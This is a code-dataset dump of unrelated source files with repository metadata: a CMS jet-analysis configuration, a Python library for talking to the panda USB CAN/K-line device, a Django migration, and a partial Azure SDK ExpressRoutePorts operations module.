d7e812f6c4172330edf6c5665208f768736883fb | 89f4284d0b5b2359c5121626e1575f95fc08a160 | /HeavyIonsAnalysis/JetAnalysis/python/jets/ak1PFJetSequence_pponPbPb_jec_cff.py | 1566b9cba8fbfa5028007b4a3d4b3932de46e4ab | [] | no_license | geun-woo/Comparing-collections-in-AOD-and-in-miniAOD | e11eb48cc8ab15a07f02a08a8a46dfd9d5a4e418 | 7b6e2118b9ce733b2ebb6f26516cbc107e37b285 | refs/heads/main | 2023-01-27T21:18:37.980241 | 2020-12-04T08:24:01 | 2020-12-04T08:24:01 | 318,445,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,268 | py | import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.mcMatchLayer0.jetMatch_cfi import patJetGenJetMatch, patJetPartonMatch
from PhysicsTools.PatAlgos.recoLayer0.jetCorrFactors_cfi import patJetCorrFactors
from PhysicsTools.PatAlgos.producersLayer1.jetProducer_cfi import patJets
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
from RecoJets.JetProducers.nJettinessAdder_cfi import Njettiness
ak1PFmatch = patJetGenJetMatch.clone(
src = cms.InputTag("ak1PFJets"),
matched = cms.InputTag("ak1HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.1
)
ak1PFmatchGroomed = patJetGenJetMatch.clone(
src = cms.InputTag("ak1HiSignalGenJets"),
matched = cms.InputTag("ak1HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.1
)
ak1PFparton = patJetPartonMatch.clone(
src = cms.InputTag("ak1PFJets"),
matched = cms.InputTag("hiSignalGenParticles"))
ak1PFcorr = patJetCorrFactors.clone(
useNPV = cms.bool(False),
useRho = cms.bool(False),
levels = cms.vstring('L2Relative'),
src = cms.InputTag("ak1PFJets"),
payload = "AK1PF"
)
ak1PFJetID = cms.EDProducer(
'JetIDProducer',
JetIDParams,
src = cms.InputTag('ak1CaloJets'))
# ak1PFclean = heavyIonCleanedGenJets.clone(
# src = cms.InputTag('ak1HiSignalGenJets'))
ak1PFbTagger = bTaggers(
"ak1PF",
0.1)
# create objects locally since they don't load properly otherwise
ak1PFPatJetPartons = ak1PFbTagger.PatJetPartons
ak1PFJetTracksAssociatorAtVertex = ak1PFbTagger.JetTracksAssociatorAtVertex
ak1PFJetTracksAssociatorAtVertex.tracks = cms.InputTag("highPurityTracks")
ak1PFSimpleSecondaryVertexHighEffBJetTags = ak1PFbTagger.SimpleSecondaryVertexHighEffBJetTags
ak1PFSimpleSecondaryVertexHighPurBJetTags = ak1PFbTagger.SimpleSecondaryVertexHighPurBJetTags
ak1PFCombinedSecondaryVertexBJetTags = ak1PFbTagger.CombinedSecondaryVertexBJetTags
ak1PFCombinedSecondaryVertexV2BJetTags = ak1PFbTagger.CombinedSecondaryVertexV2BJetTags
ak1PFJetBProbabilityBJetTags = ak1PFbTagger.JetBProbabilityBJetTags
ak1PFSoftPFMuonByPtBJetTags = ak1PFbTagger.SoftPFMuonByPtBJetTags
ak1PFSoftPFMuonByIP3dBJetTags = ak1PFbTagger.SoftPFMuonByIP3dBJetTags
ak1PFTrackCountingHighEffBJetTags = ak1PFbTagger.TrackCountingHighEffBJetTags
ak1PFTrackCountingHighPurBJetTags = ak1PFbTagger.TrackCountingHighPurBJetTags
ak1PFImpactParameterTagInfos = ak1PFbTagger.ImpactParameterTagInfos
ak1PFImpactParameterTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
ak1PFJetProbabilityBJetTags = ak1PFbTagger.JetProbabilityBJetTags
ak1PFSecondaryVertexTagInfos = ak1PFbTagger.SecondaryVertexTagInfos
ak1PFSecondaryVertexNegativeTagInfos = ak1PFbTagger.SecondaryVertexNegativeTagInfos
ak1PFNegativeSimpleSecondaryVertexHighEffBJetTags = ak1PFbTagger.NegativeSimpleSecondaryVertexHighEffBJetTags
ak1PFNegativeSimpleSecondaryVertexHighPurBJetTags = ak1PFbTagger.NegativeSimpleSecondaryVertexHighPurBJetTags
ak1PFNegativeCombinedSecondaryVertexBJetTags = ak1PFbTagger.NegativeCombinedSecondaryVertexBJetTags
ak1PFPositiveCombinedSecondaryVertexBJetTags = ak1PFbTagger.PositiveCombinedSecondaryVertexBJetTags
ak1PFNegativeCombinedSecondaryVertexV2BJetTags = ak1PFbTagger.NegativeCombinedSecondaryVertexV2BJetTags
ak1PFPositiveCombinedSecondaryVertexV2BJetTags = ak1PFbTagger.PositiveCombinedSecondaryVertexV2BJetTags
ak1PFSoftPFMuonsTagInfos = ak1PFbTagger.SoftPFMuonsTagInfos
ak1PFSoftPFMuonsTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
ak1PFSoftPFMuonBJetTags = ak1PFbTagger.SoftPFMuonBJetTags
ak1PFNegativeSoftPFMuonByPtBJetTags = ak1PFbTagger.NegativeSoftPFMuonByPtBJetTags
ak1PFPositiveSoftPFMuonByPtBJetTags = ak1PFbTagger.PositiveSoftPFMuonByPtBJetTags
ak1PFPatJetFlavourAssociation = ak1PFbTagger.PatJetFlavourAssociation
ak1PFPatJetFlavourId = cms.Sequence(ak1PFPatJetPartons*ak1PFPatJetFlavourAssociation)
ak1PFJetBtaggingIP = cms.Sequence(
ak1PFImpactParameterTagInfos *
ak1PFTrackCountingHighEffBJetTags +
ak1PFTrackCountingHighPurBJetTags +
ak1PFJetProbabilityBJetTags +
ak1PFJetBProbabilityBJetTags
)
ak1PFJetBtaggingSV = cms.Sequence(
ak1PFImpactParameterTagInfos *
ak1PFSecondaryVertexTagInfos *
ak1PFSimpleSecondaryVertexHighEffBJetTags +
ak1PFSimpleSecondaryVertexHighPurBJetTags +
ak1PFCombinedSecondaryVertexBJetTags +
ak1PFCombinedSecondaryVertexV2BJetTags
)
ak1PFJetBtaggingNegSV = cms.Sequence(
ak1PFImpactParameterTagInfos *
ak1PFSecondaryVertexNegativeTagInfos *
ak1PFNegativeSimpleSecondaryVertexHighEffBJetTags +
ak1PFNegativeSimpleSecondaryVertexHighPurBJetTags +
ak1PFNegativeCombinedSecondaryVertexBJetTags +
ak1PFPositiveCombinedSecondaryVertexBJetTags +
ak1PFNegativeCombinedSecondaryVertexV2BJetTags +
ak1PFPositiveCombinedSecondaryVertexV2BJetTags
)
ak1PFJetBtaggingMu = cms.Sequence(
ak1PFSoftPFMuonsTagInfos *
ak1PFSoftPFMuonBJetTags +
ak1PFSoftPFMuonByIP3dBJetTags +
ak1PFSoftPFMuonByPtBJetTags +
ak1PFNegativeSoftPFMuonByPtBJetTags +
ak1PFPositiveSoftPFMuonByPtBJetTags
)
ak1PFJetBtagging = cms.Sequence(
ak1PFJetBtaggingIP
* ak1PFJetBtaggingSV
# * ak1PFJetBtaggingNegSV
# * ak1PFJetBtaggingMu
)
ak1PFpatJetsWithBtagging = patJets.clone(
jetSource = cms.InputTag("ak1PFJets"),
genJetMatch = cms.InputTag("ak1PFmatch"),
genPartonMatch = cms.InputTag("ak1PFparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("ak1PFcorr")),
JetPartonMapSource = cms.InputTag("ak1PFPatJetFlavourAssociation"),
JetFlavourInfoSource = cms.InputTag("ak1PFPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("ak1PFJetTracksAssociatorAtVertex"),
useLegacyJetMCFlavour = False,
discriminatorSources = cms.VInputTag(
cms.InputTag("ak1PFSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("ak1PFSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("ak1PFCombinedSecondaryVertexBJetTags"),
cms.InputTag("ak1PFCombinedSecondaryVertexV2BJetTags"),
cms.InputTag("ak1PFJetBProbabilityBJetTags"),
cms.InputTag("ak1PFJetProbabilityBJetTags"),
# cms.InputTag("ak1PFSoftPFMuonByPtBJetTags"),
# cms.InputTag("ak1PFSoftPFMuonByIP3dBJetTags"),
cms.InputTag("ak1PFTrackCountingHighEffBJetTags"),
cms.InputTag("ak1PFTrackCountingHighPurBJetTags"),
),
tagInfoSources = cms.VInputTag(cms.InputTag("ak1PFImpactParameterTagInfos"),cms.InputTag("ak1PFSecondaryVertexTagInfos")),
jetIDMap = cms.InputTag("ak1PFJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = True,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
# embedCaloTowers = False,
# embedPFCandidates = True
)
ak1PFNjettiness = Njettiness.clone(
src = cms.InputTag("ak1PFJets"),
R0 = cms.double(0.1)
)
ak1PFpatJetsWithBtagging.userData.userFloats.src += [
'ak1PFNjettiness:tau1',
'ak1PFNjettiness:tau2',
'ak1PFNjettiness:tau3']
ak1PFJetAnalyzer = inclusiveJetAnalyzer.clone(
jetTag = cms.InputTag("ak1PFpatJetsWithBtagging"),
genjetTag = 'ak1HiSignalGenJets',
rParam = 0.1,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
doSubEvent = True,
useHepMC = cms.untracked.bool(False),
genParticles = cms.untracked.InputTag("genParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(False),
bTagJetName = cms.untracked.string("ak1PF"),
jetName = cms.untracked.string("ak1PF"),
genPtMin = cms.untracked.double(5),
doTower = cms.untracked.bool(False),
doSubJets = cms.untracked.bool(False),
doGenSubJets = cms.untracked.bool(False),
subjetGenTag = cms.untracked.InputTag("ak1GenJets"),
doGenTaus = cms.untracked.bool(False),
genTau1 = cms.InputTag("ak1HiGenNjettiness","tau1"),
genTau2 = cms.InputTag("ak1HiGenNjettiness","tau2"),
genTau3 = cms.InputTag("ak1HiGenNjettiness","tau3"),
doGenSym = cms.untracked.bool(False),
genSym = cms.InputTag("ak1GenJets","sym"),
genDroppedBranches = cms.InputTag("ak1GenJets","droppedBranches")
)
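# The sequence variants below all reuse the MC sequence: _mb (minimum bias)
# and _jec (jet energy correction) are aliases of _mc, while _data omits the
# generator matching, parton matching and flavour identification steps.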
ak1PFJetSequence_mc = cms.Sequence(
# ak1PFclean
# *
ak1PFmatch
# *
# ak1PFmatchGroomed
*
ak1PFparton
*
ak1PFcorr
# *
# ak1PFJetID
*
ak1PFPatJetFlavourId
*
ak1PFJetTracksAssociatorAtVertex
*
ak1PFJetBtagging
*
# No constituents for calo jets in pp. Must be removed for pp calo jets but
# I'm not sure how to do this transparently (Marta)
ak1PFNjettiness
*
ak1PFpatJetsWithBtagging
*
ak1PFJetAnalyzer
)
ak1PFJetSequence_data = cms.Sequence(
ak1PFcorr
*
# ak1PFJetID
# *
ak1PFJetTracksAssociatorAtVertex
*
ak1PFJetBtagging
*
ak1PFNjettiness
*
ak1PFpatJetsWithBtagging
*
ak1PFJetAnalyzer
)
ak1PFJetSequence_mb = cms.Sequence(
ak1PFJetSequence_mc)
ak1PFJetSequence_jec = cms.Sequence(
ak1PFJetSequence_mc)
ak1PFJetSequence = cms.Sequence(
ak1PFJetSequence_jec)
ak1PFJetAnalyzer.genPtMin = cms.untracked.double(1)
ak1PFJetAnalyzer.jetPtMin = cms.double(1)
| [
"[email protected]"
] | |
5a9d027ff8cc18ecab56ba138f3d711c9d7f3eff | 64a673e2e84c962ae4ab312b7f011e13f7d2df55 | /lib/panda.py | 516fb243713e658ac807e6c24b5e57f96070de17 | [
"MIT"
] | permissive | ScienceXChina/panda | c00960901246627d643cdf33ee81066988a15fdb | efca3f70939d4c2d3c8c0901536e9d89a5bbcbd6 | refs/heads/master | 2021-01-19T20:50:57.597486 | 2017-04-18T01:17:34 | 2017-04-18T01:17:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,274 | py | # python library to interface with panda
import struct
import usb1
from usb1 import USBErrorIO, USBErrorOverflow
class Panda(object):
def __init__(self, serial=None, claim=True):
context = usb1.USBContext()
self.handle = None
for device in context.getDeviceList(skip_on_error=True):
if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
if serial is None or device.getSerialNumber() == serial:
print "opening device", device.getSerialNumber()
self.handle = device.open()
if claim:
self.handle.claimInterface(0)
break
assert self.handle != None
@staticmethod
def list():
context = usb1.USBContext()
ret = []
for device in context.getDeviceList(skip_on_error=True):
if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
ret.append(device.getSerialNumber())
return ret
# ******************* health *******************
def health(self):
dat = self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xd2, 0, 0, 0x20)
a = struct.unpack("IIBBBBB", dat)
return {"voltage": a[0], "current": a[1],
"started": a[2], "controls_allowed": a[3],
"gas_interceptor_detected": a[4],
"started_signal_detected": a[5],
"started_alt": a[6]}
# ******************* can *******************
def set_gmlan(self, on):
if on:
self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xdb, 1, 0, '')
else:
self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xdb, 0, 0, '')
def can_send_many(self, arr):
snds = []
for addr, _, dat, bus in arr:
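      # Pack each message into a fixed 16-byte record: a word that appears to
      # mirror the bxCAN transmit register layout ((addr << 21) | 1 for an
      # 11-bit ID with the transmit-request bit set), a word carrying the
      # payload length in the low nibble and the bus number in bits 4-7,
      # then up to 8 data bytes, zero-padded to 16 bytes total.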
snd = struct.pack("II", ((addr << 21) | 1), len(dat) | (bus << 4)) + dat
snd = snd.ljust(0x10, '\x00')
snds.append(snd)
while 1:
try:
self.handle.bulkWrite(3, ''.join(snds))
break
except (USBErrorIO, USBErrorOverflow):
print "CAN: BAD SEND MANY, RETRYING"
def can_send(self, addr, dat, bus):
self.can_send_many([[addr, None, dat, bus]])
def can_recv(self):
def __parse_can_buffer(dat):
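      # Inverse of the transmit packing above (a sketch inferred from the
      # struct formats): f1 holds the 11-bit address in its top bits, f2
      # packs what looks like a timestamp in its upper half, the bus number
      # in bits 4-7 and the payload length in the low nibble.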
ret = []
for j in range(0, len(dat), 0x10):
ddat = dat[j:j+0x10]
f1, f2 = struct.unpack("II", ddat[0:8])
ret.append((f1 >> 21, f2>>16, ddat[8:8+(f2&0xF)], (f2>>4)&0xf))
return ret
dat = ""
while 1:
try:
dat = self.handle.bulkRead(1, 0x10*256)
break
except (USBErrorIO, USBErrorOverflow):
print "CAN: BAD RECV, RETRYING"
return __parse_can_buffer(dat)
# ******************* serial *******************
def serial_read(self, port_number):
return self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, port_number, 0, 0x100)
  def serial_write(self, port_number, ln):
    return self.handle.bulkWrite(2, chr(port_number) + ln)
# ******************* kline *******************
# pulse low for wakeup
def kline_wakeup(self):
ret = self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xf0, 0, 0, "")
def kline_drain(self, bus=2):
# drain buffer
bret = ""
while 1:
ret = self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, bus, 0, 0x100)
if len(ret) == 0:
break
bret += str(ret)
return bret
def kline_ll_recv(self, cnt, bus=2):
echo = ""
while len(echo) != cnt:
echo += str(self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, bus, 0, cnt-len(echo)))
return echo
def kline_send(self, x, bus=2, checksum=True):
def get_checksum(dat):
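      # K-line checksum: sum the bytes, negate, keep the low 8 bits
      # (two's complement). Worked example: for '\x68\x6a\xf1' the byte sum
      # is 0x1c3, so the checksum byte is (-0x1c3) & 0xff == 0x3d.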
result = 0
result += sum(map(ord, dat))
result = -result
return chr(result&0xFF)
self.kline_drain(bus=bus)
if checksum:
x += get_checksum(x)
for i in range(0, len(x), 0x10):
ts = x[i:i+0x10]
self.handle.bulkWrite(2, chr(bus)+ts)
echo = self.kline_ll_recv(len(ts), bus=bus)
if echo != ts:
print "**** ECHO ERROR %d ****" % i
print echo.encode("hex")
print ts.encode("hex")
assert echo == ts
def kline_recv(self, bus=2):
msg = self.kline_ll_recv(2, bus=bus)
msg += self.kline_ll_recv(ord(msg[1])-2, bus=bus)
return msg
| [
"[email protected]"
] | |
2224a59c364b7d23fe7e1fda9e1c4882185ad1a2 | 7c8bff784568691c516833ac81afc967857d24e2 | /jacc/migrations/0013_auto_20180329_1052.py | 416bb15ffddf4f84db0de59def8ab08f641d0a94 | [
"MIT"
] | permissive | kajala/django-jacc | b71f2c3df1321b9bb31e1e648895931b735949a6 | 4acb8ca2d32b11fd5afa3b5316b13be223b20ec6 | refs/heads/develop | 2023-08-18T14:12:38.196880 | 2023-08-11T15:18:57 | 2023-08-11T15:18:57 | 121,229,896 | 11 | 5 | MIT | 2021-07-12T15:02:36 | 2018-02-12T10:02:20 | Python | UTF-8 | Python | false | false | 458 | py | # Generated by Django 2.0.2 on 2018-03-29 10:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("jacc", "0012_auto_20180218_0638"),
]
operations = [
migrations.AlterField(
model_name="invoice",
name="number",
field=models.BigIntegerField(blank=True, db_index=True, default=None, null=True, verbose_name="invoice number"),
),
]
| [
"[email protected]"
] | |
6ba866c5effbeeecf9d64d9022e00310d5b49761 | 564d6a4d305a8ac6a7e01c761831fb2081c02d0f | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_08_01/operations/_express_route_ports_operations.py | c4af97d395be72cb5207f65765cddeee106487ae | [
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] | permissive | paultaiton/azure-sdk-for-python | 69af4d889bac8012b38f5b7e8108707be679b472 | d435a1a25fd6097454b7fdfbbdefd53e05029160 | refs/heads/master | 2023-01-30T16:15:10.647335 | 2020-11-14T01:09:50 | 2020-11-14T01:09:50 | 283,343,691 | 0 | 0 | MIT | 2020-07-28T22:43:43 | 2020-07-28T22:43:43 | null | UTF-8 | Python | false | false | 28,861 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ExpressRoutePortsOperations(object):
"""ExpressRoutePortsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'expressRoutePortName': self._serialize.url("express_route_port_name", express_route_port_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified ExpressRoutePort resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param express_route_port_name: The name of the ExpressRoutePort resource.
:type express_route_port_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
express_route_port_name=express_route_port_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
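    # --------------------------------------------------------------------
    # Minimal usage sketch (illustrative only; `network_client` and the
    # resource names are placeholders, not defined in this module):
    #
    #   poller = network_client.express_route_ports.begin_delete(
    #       resource_group_name="my-rg",
    #       express_route_port_name="my-port")
    #   poller.result()  # block until the long-running delete completes
    #
    #   # A poller can also be saved and resumed via its continuation token:
    #   token = poller.continuation_token()
    #   resumed = network_client.express_route_ports.begin_delete(
    #       "my-rg", "my-port", continuation_token=token)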
def get(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.ExpressRoutePort"
"""Retrieves the requested ExpressRoutePort resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
        :param express_route_port_name: The name of the ExpressRoutePort resource.
:type express_route_port_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ExpressRoutePort, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_08_01.models.ExpressRoutePort
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePort"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'expressRoutePortName': self._serialize.url("express_route_port_name", express_route_port_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
parameters, # type: "models.ExpressRoutePort"
**kwargs # type: Any
):
# type: (...) -> "models.ExpressRoutePort"
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePort"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'expressRoutePortName': self._serialize.url("express_route_port_name", express_route_port_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ExpressRoutePort')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
parameters, # type: "models.ExpressRoutePort"
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.ExpressRoutePort"]
"""Creates or updates the specified ExpressRoutePort resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param express_route_port_name: The name of the ExpressRoutePort resource.
:type express_route_port_name: str
:param parameters: Parameters supplied to the create ExpressRoutePort operation.
:type parameters: ~azure.mgmt.network.v2019_08_01.models.ExpressRoutePort
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ExpressRoutePort or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_08_01.models.ExpressRoutePort]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePort"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
express_route_port_name=express_route_port_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
